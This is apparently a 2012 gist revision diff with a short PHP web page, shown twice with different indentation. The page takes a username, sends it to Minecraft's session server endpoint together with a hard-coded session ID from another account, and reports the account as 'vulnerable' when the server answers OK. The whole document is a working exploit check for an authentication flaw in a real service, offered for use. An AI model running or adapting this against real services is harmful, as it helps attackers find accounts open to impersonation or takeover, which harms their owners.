ajvpot · July 15, 2012 06:30
diff --git a/gistfile1.aw b/gistfile1.aw
 <?php
 $sessid = "herpderp"; //insert a session id from a migrated account here.
 if(isset($_POST["name"]) && !empty($_POST["name"])){
    $name=$_POST["name"];
    $url="http://session.minecraft.net/game/joinserver.jsp?user=$name&sessionId=$sessid&serverId=a";
    $res=file_get_contents($url);
    if($res == "OK") die("<b><font color=green>The account ".htmlspecialchars($name)." is vulnerable.</font></b>");
    if($res == "Bad login") die("<font color=red>The account ".htmlspecialchars($name)." is NOT vulnerable or is not migrated.</font>");
    echo "Could not determine status of account ($res)";
 }else{
 ?>
 <form name="input" action="" method="post">
 Username: <input type="text" name="name" />
 <input type="submit" value="Submit" />
 </form>
 <?php
 }
 ?>
	<?php
	$sessid = "herpderp"; //insert a session id from a migrated account here.
	if(isset($_POST["name"]) && !empty($_POST["name"])){
	$name=$_POST["name"];
	$url="http://session.minecraft.net/game/joinserver.jsp?user=$name&sessionId=$sessid&serverId=a";
	$res=file_get_contents($url);
	if($res == "OK") die("<b><font color=green>The account ".htmlspecialchars($name)." is vulnerable.</font></b>");
	if($res == "Bad login") die("<font color=red>The account ".htmlspecialchars($name)." is NOT vulnerable or is not migrated.</font>");
	echo "Could not determine status of account ($res)";
	}else{
	?>
	<form name="input" action="" method="post">
	Username: <input type="text" name="name" />
	<input type="submit" value="Submit" />
	</form>
	<?php
	}
	?>